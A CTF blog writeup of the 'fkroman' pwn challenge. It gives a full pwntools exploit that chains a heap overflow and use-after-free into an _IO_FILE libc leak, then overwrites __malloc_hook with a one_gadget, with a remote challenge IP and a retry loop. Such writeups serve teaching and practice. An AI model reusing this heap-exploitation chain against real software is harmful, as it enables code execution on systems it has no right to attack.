数字经济 pwn fkroman writeup

思路

  • 利用堆溢出伪造堆块,并用uaf漏洞打_IO_FILE泄露出libc地址
  • 再用uaf漏洞劫持malloc_hook为one_gadget

exp

本地环境:Ubuntu 16.04,成功率不高

#!/usr/bin/env python2

from pwn import *
context(log_level='debug', arch='amd64', os='linux')  # pwntools: verbose tube logging, x86-64 target

exe = './fkroman'        # the challenge binary
lib = './libc-2.23.so'   # the glibc build every offset below was derived for
ip = '121.40.246.48'     # remote CTF instance quoted by the writeup; only read when LOCAL == 0
port = 9999
elf = ELF(exe)
libc = ELF(lib)          # libc.address stays 0 until exp() rebases it after the stage-1 leak


def dbg(script=''):
    """Attach gdb to the live target, optionally running *script* first.

    Reads the module-global tube ``io`` (assigned in ``__main__``); ``attach``
    comes from the pwntools star-import at the top of the file.
    """
    gdb_commands = script
    attach(io, gdbscript=gdb_commands)

def choice(idx):
    """Answer the program's menu prompt with option number *idx*.

    Uses the module-global tube ``io``.
    """
    answer = str(idx)
    io.sendlineafter('Your choice: ', answer)

def index(idx):
    """Answer the program's 'Index: ' prompt with slot number *idx*.

    Uses the module-global tube ``io``.
    """
    slot = str(idx)
    io.sendlineafter('Index: ', slot)

def add(idx, size):
    """Drive menu option 1: slot *idx*, then the 'Size: ' prompt with *size*.

    Only sends the three answers; the module-global tube ``io`` carries them.
    """
    choice(1)
    index(idx)
    requested = str(size)
    io.sendlineafter('Size: ', requested)

def dele(idx):
    """Drive menu option 3 for slot *idx* (the slot stays addressable afterwards,
    which is the use-after-free the writeup relies on).

    Menu answer is sent inline instead of via choice(); same bytes on the wire.
    """
    io.sendlineafter('Your choice: ', '3')
    index(idx)

def edit(idx, size, content):
    """Drive menu option 4: write *content* into slot *idx*, declaring *size* bytes.

    *size* is whatever the caller passes — exp() deliberately declares more
    than the slot was allocated with, which per the writeup the binary does
    not bound-check (the heap overflow). *content* is sent raw, without a
    trailing newline.
    """
    choice(4)
    index(idx)
    declared_length = str(size)
    io.sendlineafter('Size: ', declared_length)
    io.sendafter('Content: ', content)

# ------------------------------------------------
LOCAL = 1  # 1: spawn ./fkroman locally (see __main__); 0: connect to ip:port instead
iofile_off = [0x25dd,0xf5eb] #_IO_2_1_stderr_+157
# ^ two 16-bit values; only [0] is used (exp(), stage 1). The author's note ties the
#   first to _IO_2_1_stderr_+157 of the pinned libc-2.23 build; the second is unused
#   here — presumably an alternative for another build, unconfirmed.
libc_off = 0x7ffff7dd2600-0x7ffff7a0d000
# ^ distance from the leaked pointer to the libc base. The 0x7ffff7... values look
#   like they were read in a debugger with ASLR off; valid only for this libc-2.23.so.
onegadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
# ^ candidate one_gadget offsets for the pinned libc; exp() uses index 1.
# ------------------------------------------------


def exp():
    """Run the author's two-stage chain against the tube in the module-global ``io``.

    Stage 1 leaks a libc address, stage 2 redirects ``__malloc_hook`` (writeup:
    heap overflow plus use-after-free on the same slots). Every add/dele/edit
    below changes the heap layout the next step assumes, so the call order is
    load-bearing: read the body as one unit and do not reorder it. The writeup
    reports a low success rate; ``__main__`` retries up to 100 times.

    Defender notes: the chain is pinned to libc-2.23 (``lib`` above) — the leak
    offsets and one_gadget list are build-specific, and ``__malloc_hook`` no
    longer exists in glibc 2.34+. The root cause the writeup names is an edit
    path that apparently trusts a caller-supplied size and still acts on freed
    slots; bounding that size and clearing freed slot pointers removes both stages.
    """
    # Four slots; requested sizes 0x68, 0x68, 0x88, 0x18 (the author's "#0".."#3").
    add(0, 0x70-8) #0
    add(1, 0x70-8) #1
    add(2, 0x90-8) #2
    add(3, 0x20-8) #3
    #-------------------leak libc---------------------
    # Free three slots and keep editing them: the use-after-free the writeup names.
    dele(1)
    dele(0)
    dele(2)
    edit(0, 1, p8(0xe0))               # 1-byte write into freed slot 0
    # 0x70 bytes into a slot requested with 0x68: 8 bytes past its end (the heap
    # overflow the writeup names); the trailing qword is 0x71.
    edit(1, 0x70, 'A'*0x68+p64(0x71))
    edit(2, 2, p16(iofile_off[0]))     # 2-byte partial write into freed slot 2
    #gdb.attach(io)
    add(4, 0x70-8) #0
    #gdb.attach(io)
    add(5, 0x70-8) #2
    #gdb.attach(io)
    add(6, 0x70-8) #target
    #gdb.attach(io)
    # 0x54 bytes: 3 filler + 6 zero qwords + 0xfbad1800 + 3 zero qwords + NUL,
    # written through the slot the author labels "target".
    edit(6, 0x54, 'A'*3+p64(0)*6+p64(0x00000000fbad1800)+p64(0)*3+"\x00")
    #gdb.attach(io)
    # Skip 0x40 bytes of program output, then read 8 bytes as a little-endian pointer.
    io.recv(0x40)
    recv_addr=u64(io.recv(8))
    log.info('libc->'+hex(recv_addr))
    pause()                                # pwntools pause(): blocks until the operator continues
    libc.address = recv_addr - libc_off    # rebase the ELF object; libc.sym[...] below depends on it
    log.info(hex(libc.address))

    #-------------------malloc_hook-------------------
    add(7, 0x70-8) #2
    edit(7, 0x70, 'B'*0x68+p64(0x21))      # same 8-byte overrun pattern as slot 1; trailing qword 0x21
    dele(7)
    info(hex(libc.sym['__malloc_hook']-0x23))
    pause()
    edit(7, 8, p64(libc.sym['__malloc_hook']-0x23)) #0x7fefcf441aed _IO_wide_data_0+301
    # ^ 8-byte write into freed slot 7 (use-after-free again).
    # NOTE(review): this gdb.attach and the one after add(9) are active, unlike the
    # commented-out ones above; an unattended run (the retry loop in __main__) stops here.
    gdb.attach(io)
    add(8, 0x70-8) #2
    add(9, 0x70-8) #target2
    gdb.attach(io)
    info(hex(libc.address+onegadgets[1]))  # onegadgets[1] is the candidate the author settled on
    pause()
    edit(9, 0x1b, 'C'*0x13+p64(libc.address+onegadgets[1])) #0x7fefcf0c226a
    #gdb.attach(io)
    add(10, 0)                             # per the writeup, this allocation is what invokes the hijacked hook
    io.interactive()


# ------------------------------------------------
if __name__ == '__main__':

    # Retry loop: the writeup reports a low success rate, so up to 100 attempts.
    for i in range(100):
        try:
            if LOCAL:
                # Module-level assignment: every helper above reads this global.
                io = elf.process()
                # NOTE(review): env is built but not passed anywhere in this block,
                # so it has no effect on the spawned process as written.
                env={"LD_PRELOAD": libc.path}
            else:
                io = remote(ip, port)
            exp()
        # Bare except: swallows everything, including KeyboardInterrupt; a failed
        # attempt prints only its index and the previous tube is never closed.
        except:
            print i

参考文章:
https://mp.weixin.qq.com/s/Q4A6LwCd2E29uSXjMJs1dg
https://firmianay.gitbooks.io/ctf-all-in-one/doc/4.13_io_file.html

文章作者: nocbtm
文章链接: https://nocbtm.github.io/2019/09/28/数字经济 pwn fkroman writeup/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 nocbtm's Blog